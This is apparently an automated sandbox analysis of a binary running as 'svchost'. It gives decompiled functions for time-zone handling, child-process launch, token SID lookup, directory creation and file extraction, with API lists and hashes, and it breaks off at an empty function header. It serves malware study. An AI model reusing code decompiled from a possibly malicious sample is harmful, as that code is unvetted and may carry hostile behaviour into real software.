                            control_flow_graph 401 bdb193-bdb1bb call bdabfc call bdac5a 406 bdb1c1-bdb1cd call bdac02 401->406 407 bdb2e3-bdb33f call bd1798 call bd6cc0 401->407 406->407 413 bdb1d3-bdb1df call bdac2e 406->413 418 bdb349-bdb34c 407->418 419 bdb341-bdb347 407->419 413->407 420 bdb1e5-bdb206 call bd09eb GetTimeZoneInformation 413->420 421 bdb38f-bdb3a1 418->421 422 bdb34e-bdb35e call bd0a25 418->422 419->421 430 bdb20c-bdb22d 420->430 431 bdb2bf-bdb2e2 call bdabf6 call bdabea call bdabf0 420->431 425 bdb3b1 call bdb193 421->425 426 bdb3a3-bdb3a6 421->426 433 bdb368-bdb381 call bd6cc0 422->433 434 bdb360 422->434 439 bdb3b6-bdb3cd call bd09eb call bc786a 425->439 426->425 429 bdb3a8-bdb3af call bdafbe 426->429 429->439 437 bdb22f-bdb234 430->437 438 bdb237-bdb23e 430->438 456 bdb386-bdb38c call bd09eb 433->456 457 bdb383-bdb384 433->457 443 bdb361-bdb366 call bd09eb 434->443 437->438 440 bdb256-bdb259 438->440 441 bdb240-bdb247 438->441 452 bdb25c-bdb27d call bd7d59 WideCharToMultiByte 440->452 441->440 447 bdb249-bdb254 441->447 461 bdb38e 443->461 447->452 465 bdb27f-bdb282 452->465 466 bdb28b-bdb28d 452->466 456->461 457->443 461->421 465->466 469 bdb284-bdb289 465->469 468 bdb28f-bdb2ab WideCharToMultiByte 466->468 470 bdb2ad-bdb2b0 468->470 471 bdb2ba-bdb2bd 468->471 469->468 470->471 472 bdb2b2-bdb2b8 470->472 471->431 472->431
                            C-Code - Quality: 73%
                            			E00BDB193(void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				void* _t45;
				signed int _t49;
				void* _t53;
				void* _t55;
				long _t57;
				signed int* _t60;
				intOrPtr _t70;
				void* _t79;
				signed int _t86;
				void* _t88;
				signed int _t89;
				signed int _t91;
				int _t95;
				void* _t97;
				char** _t98;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				intOrPtr _t120;
				intOrPtr _t122;

				_t98 = E00BDABFC();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E00BDAC5A( &_v8);
				_t79 = _t97;
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00BD1798();
					asm("int3");
					_t110 = _t111;
					_t38 =  *0xbec008; // 0xdc55bb75
					_v56 = _t38 ^ _t110;
					 *0xbec91c =  *0xbec91c | 0xffffffff;
					 *0xbec910 =  *0xbec910 | 0xffffffff;
					_push(0);
					_push(_t98);
					_t76 = "TZ";
					_t91 = 0;
					 *0xbf6578 = 0;
					_t42 = E00BD6CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t104 = E00BD0A25(_t79, _v272);
							__eflags = _t104;
							if(__eflags != 0) {
								_t49 = E00BD6CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
								__eflags = _t49;
								if(_t49 == 0) {
									E00BD09EB(0);
									_t91 = _t104;
								} else {
									_push(_t104);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E00BD09EB();
							}
						}
					} else {
						_t91 =  &_v268;
					}
					asm("sbb esi, esi");
					_t102 =  ~(_t91 -  &_v268) & _t91;
					__eflags = _t91;
					if(__eflags == 0) {
						L33:
						E00BDB193(__eflags); // executed
					} else {
						__eflags =  *_t91;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t91);
							E00BDAFBE(__eflags);
						}
					}
					_t45 = E00BD09EB(_t102);
					__eflags = _v12 ^ _t110;
					E00BC786A();
					return _t45;
				} else {
					_t53 = E00BDAC02( &_v12);
					_pop(_t79);
					if(_t53 != 0) {
						goto L19;
					} else {
						_t55 = E00BDAC2E( &_v16);
						_pop(_t79);
						if(_t55 != 0) {
							goto L19;
						} else {
							E00BD09EB( *0xbf6574);
							 *0xbf6574 = 0;
							 *_t111 = 0xbf6580; // executed
							_t57 = GetTimeZoneInformation(??); // executed
							if(_t57 != 0xffffffff) {
								_t86 =  *0xbf6580 * 0x3c;
								_t89 =  *0xbf65d4; // 0x0
								_push(_t90);
								 *0xbf6578 = 1;
								_v8 = _t86;
								_t120 =  *0xbf65c6; // 0xb
								if(_t120 != 0) {
									_v8 = _t86 + _t89 * 0x3c;
								}
								_t122 =  *0xbf661a; // 0x3
								if(_t122 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t70 =  *0xbf6628; // 0xffffffc4
									if(_t70 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t70 - _t89) * 0x3c;
									}
								}
								_t95 = E00BD7D59(0, _t89);
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t98) = 0;
								} else {
									( *_t98)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t98[1]) = 0;
								} else {
									_t98[1][0x3f] = 0;
								}
							}
							 *(E00BDABF6()) = _v8;
							 *(E00BDABEA()) = _v12;
							_t60 = E00BDABF0();
							 *_t60 = _v16;
							return _t60;
						}
					}
				}
			}









































                            0x00bdb1a2
                            0x00bdb1a9
                            0x00bdb1ad
                            0x00bdb1b0
                            0x00bdb1b3
                            0x00bdb1b8
                            0x00bdb1bb
                            0x00bdb2e3
                            0x00bdb2e3
                            0x00bdb2e4
                            0x00bdb2e5
                            0x00bdb2e6
                            0x00bdb2e7
                            0x00bdb2e8
                            0x00bdb2ed
                            0x00bdb2f1
                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb317
                            0x00bdb318
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33d
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb39f
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c2
                            0x00bdb3c5
                            0x00bdb3cd
                            0x00bdb1c1
                            0x00bdb1c5
                            0x00bdb1ca
                            0x00bdb1cd
                            0x00000000
                            0x00bdb1d3
                            0x00bdb1d7
                            0x00bdb1dc
                            0x00bdb1df
                            0x00000000
                            0x00bdb1e5
                            0x00bdb1eb
                            0x00bdb1f0
                            0x00bdb1f6
                            0x00bdb1fd
                            0x00bdb206
                            0x00bdb20c
                            0x00bdb213
                            0x00bdb219
                            0x00bdb21d
                            0x00bdb223
                            0x00bdb226
                            0x00bdb22d
                            0x00bdb234
                            0x00bdb234
                            0x00bdb237
                            0x00bdb23e
                            0x00bdb256
                            0x00bdb256
                            0x00bdb259
                            0x00bdb240
                            0x00bdb240
                            0x00bdb247
                            0x00000000
                            0x00bdb249
                            0x00bdb24b
                            0x00bdb251
                            0x00bdb251
                            0x00bdb247
                            0x00bdb261
                            0x00bdb27d
                            0x00bdb28d
                            0x00bdb284
                            0x00bdb286
                            0x00bdb286
                            0x00bdb2ab
                            0x00bdb2bd
                            0x00bdb2b2
                            0x00bdb2b5
                            0x00bdb2b5
                            0x00bdb2ab
                            0x00bdb2c7
                            0x00bdb2d1
                            0x00bdb2d6
                            0x00bdb2db
                            0x00bdb2e2
                            0x00bdb2e2
                            0x00bdb1df
                            0x00bdb1cd

                            APIs
                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            • Opcode ID: 0ea933617849e261a536a877f11e6cfa0dfa77238e20c2a10436daed2b9c9d4a
                            • Instruction ID: 66f892b77dee4397ea6433c1b2d4c7b942ce8ce43d0fadee5be88eb5d94a353e
                            • Opcode Fuzzy Hash: 0ea933617849e261a536a877f11e6cfa0dfa77238e20c2a10436daed2b9c9d4a
                            • Instruction Fuzzy Hash: C251A572900209EBCB10DF659C81DBEFBF8EB51360B1102EBE914A7391FB308E418B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4400, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100processsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 62%
                            			E00BC4400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
				struct _SECURITY_ATTRIBUTES* _v0;
				signed int _t26;
				intOrPtr _t45;
				int _t51;
				signed int _t53;
				signed int _t64;
				DWORD* _t66;
				void* _t70;

				_t70 = __eflags;
				_t62 = __edx;
				E00BC7880();
				_t26 =  *0xbec008; // 0xdc55bb75
				_a8292 = _t26 ^ _t64;
				_v0 = 0;
				E00BC4BF0( &_a100, _a8300, 0x1000);
				_push(1);
				_push(0x16);
				E00BCEDBE(__edx, _t70);
				_push(1);
				_push(2); // executed
				E00BCEDBE(__edx, _t70); // executed
				_push(1);
				_push(0xf);
				E00BCEDBE(__edx, _t70);
				_push(1);
				_push(0x15);
				E00BCEDBE(_t62, _t70);
				_a4.nLength = 0xc;
				_a8 = 0;
				_a12 = 1;
				GetStartupInfoW( &_a32);
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a76 = 0x101;
				_a80 = 1;
				_a88 = E00BCE926(E00BD09C5(E00BCA7EB(0)));
				_a92 = E00BCE926(E00BD09C5(E00BCA7EB(1)));
				_t45 = E00BCE926(E00BD09C5(E00BCA7EB(2)));
				_t66 = _t64 + 0x50;
				_a96 = _t45;
				_t51 = CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16); // executed
				if(_t51 == 0) {
					_push("Error creating child process!\n");
					_push("CreateProcessW");
					_t53 = E00BC1860(_t62, __eflags) | 0xffffffff;
					__eflags = _t53;
					E00BC786A();
					return _t53;
				} else {
					WaitForSingleObject(_a16.hProcess, 0xffffffff);
					GetExitCodeProcess(_a16, _t66); // executed
					E00BC786A();
					return _v0;
				}
			}











                            0x00bc4400
                            0x00bc4400
                            0x00bc4405
                            0x00bc440a
                            0x00bc4411
                            0x00bc4429
                            0x00bc4432
                            0x00bc4437
                            0x00bc4439
                            0x00bc443b
                            0x00bc4440
                            0x00bc4442
                            0x00bc4444
                            0x00bc4449
                            0x00bc444b
                            0x00bc444d
                            0x00bc4452
                            0x00bc4454
                            0x00bc4456
                            0x00bc445e
                            0x00bc446a
                            0x00bc4472
                            0x00bc447b
                            0x00bc4486
                            0x00bc4490
                            0x00bc4498
                            0x00bc44a0
                            0x00bc44a8
                            0x00bc44c0
                            0x00bc44d7
                            0x00bc44e7
                            0x00bc44ec
                            0x00bc44ef
                            0x00bc451b
                            0x00bc4523
                            0x00bc4557
                            0x00bc455c
                            0x00bc4572
                            0x00bc4572
                            0x00bc4575
                            0x00bc4580
                            0x00bc4525
                            0x00bc452b
                            0x00bc4539
                            0x00bc454b
                            0x00bc4556
                            0x00bc4556

                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BCEDBE: SetConsoleCtrlHandler.KERNELBASE(00BCEA12,00000001,00BEA620,00000018,00BC4440,00000016,00000001,?,?,00001000,00BC26B4,?,00000000), ref: 00BCEED7
                              • Part of subcall function 00BCEDBE: GetLastError.KERNEL32 ref: 00BCEEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 00BC447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00BC450C
                            • CreateProcessW.KERNELBASE ref: 00BC451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC452B
                            • GetExitCodeProcess.KERNELBASE ref: 00BC4539
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: b707c46ab429ee1e5b620c741458b37b65c006ae1a8b4ed0b4569e83989d17fb
                            • Instruction ID: 993076f19481b37966b6aafcfaa4756ef9fd061b5ded57d43612289ce40baf16
                            • Opcode Fuzzy Hash: b707c46ab429ee1e5b620c741458b37b65c006ae1a8b4ed0b4569e83989d17fb
                            • Instruction Fuzzy Hash: 3E3150B0954344ABEB20BB60CC4EF8B76E8AF44704F00495DB695AB2D2EBB9D544CB53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4920, Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 512 bc4920-bc4950 GetCurrentProcess OpenProcessToken 513 bc49ae-bc49bf call bc9803 512->513 514 bc4952-bc4967 GetTokenInformation 512->514 521 bc49c8-bc49cf 513->521 522 bc49c1-bc49c2 CloseHandle 513->522 515 bc4969-bc4972 GetLastError 514->515 516 bc4974-bc4986 call bc97f8 514->516 515->513 515->516 516->513 523 bc4988-bc49a0 GetTokenInformation 516->523 522->521 523->513 524 bc49a2-bc49a9 ConvertSidToStringSidW 523->524 524->513
                            C-Code - Quality: 70%
                            			E00BC4920() {
				void* _v4;
				void* _v8;
				long _v12;
				long _v16;
				void* _t18;
				int _t22;
				int _t25;
				void* _t28;
				void* _t30;
				long* _t32;

				_t32 =  &_v12;
				_v8 = 0xffffffff;
				_t30 = 0;
				_v12 = 0;
				_v4 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t22 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
					if(_t22 != 0 || GetLastError() == 0x7a) {
						_push(_v16);
						_push(1);
						_t30 = E00BC97F8(_t28);
						_t32 =  &(_t32[2]);
						if(_t30 != 0) {
							_t25 = GetTokenInformation(_v12, 1, _t30, _v16,  &_v16); // executed
							if(_t25 != 0) {
								_push( &_v12);
								_push( *_t30);
								L00BC7858();
							}
						}
					}
				}
				L00BC9803(_t30);
				_t18 = _v8;
				if(_t18 != 0xffffffff) {
					CloseHandle(_t18);
				}
				return _v4;
			}













                            0x00bc4920
                            0x00bc4928
                            0x00bc4931
                            0x00bc4933
                            0x00bc493d
                            0x00bc4950
                            0x00bc495f
                            0x00bc4967
                            0x00bc4974
                            0x00bc4978
                            0x00bc497f
                            0x00bc4981
                            0x00bc4986
                            0x00bc4998
                            0x00bc49a0
                            0x00bc49a6
                            0x00bc49a7
                            0x00bc49a9
                            0x00bc49a9
                            0x00bc49a0
                            0x00bc4986
                            0x00bc4967
                            0x00bc49af
                            0x00bc49b4
                            0x00bc49bf
                            0x00bc49c2
                            0x00bc49c2
                            0x00bc49cf

                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00BC4941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00BC4948
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00BC495F
                            • GetLastError.KERNEL32 ref: 00BC4969
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00BC4998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00BC49A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC49C2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            • Opcode ID: 5a6ee63d591d83bb6be8bc16d9dce6324b07dd25b86158acacfacc9a75d95cea
                            • Instruction ID: f7dd052f249e8ca1211d5d7284ad9261e05c01bad4ffbdcafd807cb663b267c6
                            • Opcode Fuzzy Hash: 5a6ee63d591d83bb6be8bc16d9dce6324b07dd25b86158acacfacc9a75d95cea
                            • Instruction Fuzzy Hash: 1B114F71544221AFD620AF54DC88F5B7FE8EF40760F00495CF989D61A1DBB1CA99CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1320, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 83%
                            			E00BC1320(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				signed int _t9;
				void* _t10;
				signed int _t15;
				signed int _t17;
				void* _t19;
				intOrPtr _t27;
				signed int _t28;
				intOrPtr _t29;
				signed int _t30;
				void* _t31;

				_t21 = __edx;
				_t20 = __ecx;
				_t29 =  *((intOrPtr*)(_t31 + 0x10));
				_t27 =  *((intOrPtr*)(_t31 + 0x10));
				_push(_t29);
				_push(_t27);
				_t19 = E00BC1220(__ecx, __edx);
				_t7 = E00BC3C20(__edx, _t27);
				if(_t7 != 0xffffffff) {
					_t3 = _t29 + 0x12; // 0x12
					_t23 = _t3;
					_t4 = _t27 + 0x2068; // 0x2068
					_push(_t3);
					_t9 = E00BC3EF0(_t19, _t3, __eflags);
					_t28 = _t9;
					_push( *((intOrPtr*)(_t29 + 0xc)));
					L00BC7864();
					_t30 = _t9;
					__eflags = _t28;
					if(__eflags != 0) {
						_t10 = E00BCA6CB(_t20, _t19, _t30, 1, _t28); // executed
						__eflags = _t10 - 1;
						if(__eflags == 0) {
							L7:
							_push(_t28); // executed
							E00BC9889(_t20, _t21, __eflags); // executed
							L00BC9803(_t19); // executed
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t30;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t15 = E00BC17B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
								__eflags = _t15;
								return _t15;
							}
						}
					} else {
						_t17 = E00BC17B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
						__eflags = _t17;
						return _t17;
					}
				} else {
					return _t7;
				}
			}

















                            0x00bc1320
                            0x00bc1320
                            0x00bc1322
                            0x00bc1327
                            0x00bc132b
                            0x00bc132c
                            0x00bc1333
                            0x00bc1335
                            0x00bc1340
                            0x00bc1349
                            0x00bc1349
                            0x00bc134c
                            0x00bc1352
                            0x00bc1354
                            0x00bc135c
                            0x00bc135e
                            0x00bc1361
                            0x00bc1366
                            0x00bc1368
                            0x00bc136a
                            0x00bc138c
                            0x00bc1394
                            0x00bc1397
                            0x00bc13b8
                            0x00bc13b8
                            0x00bc13b9
                            0x00bc13bf
                            0x00bc13c7
                            0x00bc13cd
                            0x00bc1399
                            0x00bc1399
                            0x00bc139b
                            0x00000000
                            0x00bc139d
                            0x00bc13b0
                            0x00bc13b0
                            0x00bc13b7
                            0x00bc13b7
                            0x00bc139b
                            0x00bc136c
                            0x00bc137f
                            0x00bc137f
                            0x00bc1386
                            0x00bc1386
                            0x00bc1344
                            0x00bc1347
                            0x00bc1347

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 22257cc364be4af42ae445a7ff358fd073f32f7c56f34be782e3f0b65398b543
                            • Instruction ID: 2e014bd8dcd3750b5780f228e8a822c374f737257daa49b7a7d73b037c21f9e0
                            • Opcode Fuzzy Hash: 22257cc364be4af42ae445a7ff358fd073f32f7c56f34be782e3f0b65398b543
                            • Instruction Fuzzy Hash: 0F11C663A5135833C61071BD3C4AEDB33DCCE83776B044BEAF920A2583E792991441B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4B30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 72%
                            			E00BC4B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES _v16;
				signed int _t12;
				signed int _t19;
				signed int _t21;
				WCHAR* _t33;
				void* _t37;
				signed int _t40;

				E00BC7880();
				_t12 =  *0xbec008; // 0xdc55bb75
				_a8204 = _t12 ^ _t40;
				_t33 = _a8212;
				_t37 = E00BC4920();
				_t27 =  !=  ? _t37 : L"S-1-3-4";
				E00BC49D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
				LocalFree(_t37);
				_push(0);
				_v0 = 0xc;
				_push( &_a4);
				_push(1);
				_t19 =  &_a12;
				_a8 = 0;
				_push(_t19); // executed
				L00BC785E(); // executed
				if(_t19 != 0) {
					_t21 = CreateDirectoryW(_t33,  &_v16); // executed
					asm("sbb eax, eax");
					E00BC786A();
					return  ~( ~_t21) - 1;
				} else {
					E00BC786A();
					return _t19 | 0xffffffff;
				}
			}











                            0x00bc4b35
                            0x00bc4b3a
                            0x00bc4b41
                            0x00bc4b4a
                            0x00bc4b56
                            0x00bc4b63
                            0x00bc4b72
                            0x00bc4b7b
                            0x00bc4b81
                            0x00bc4b87
                            0x00bc4b8f
                            0x00bc4b90
                            0x00bc4b92
                            0x00bc4b96
                            0x00bc4b9e
                            0x00bc4b9f
                            0x00bc4ba6
                            0x00bc4bc8
                            0x00bc4bd8
                            0x00bc4be0
                            0x00bc4beb
                            0x00bc4ba8
                            0x00bc4bb6
                            0x00bc4bc1
                            0x00bc4bc1

                            APIs
                              • Part of subcall function 00BC4920: GetCurrentProcess.KERNEL32(00000008,?), ref: 00BC4941
                              • Part of subcall function 00BC4920: OpenProcessToken.ADVAPI32(00000000), ref: 00BC4948
                              • Part of subcall function 00BC4920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00BC495F
                              • Part of subcall function 00BC4920: GetLastError.KERNEL32 ref: 00BC4969
                              • Part of subcall function 00BC4920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00BC4998
                              • Part of subcall function 00BC4920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00BC49A9
                              • Part of subcall function 00BC4920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC49C2
                            • LocalFree.KERNEL32(00000000,00BC3D37,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC4B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00BC4B9F
                            • CreateDirectoryW.KERNELBASE(?,?,?), ref: 00BC4BC8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 142a9d9453a16a66ce799071261f7e5b77556d0f46eb47203423dde03167f370
                            • Instruction ID: 671d544809ce71ef11a46692bf8ed53d0eac9c8442e5a52fe6839a7c9f4b8353
                            • Opcode Fuzzy Hash: 142a9d9453a16a66ce799071261f7e5b77556d0f46eb47203423dde03167f370
                            • Instruction Fuzzy Hash: 7C11E9716443409FE624EB25DC5AFAB77D8EF84710F404A5DF945C61C3EB749904CAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1120, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
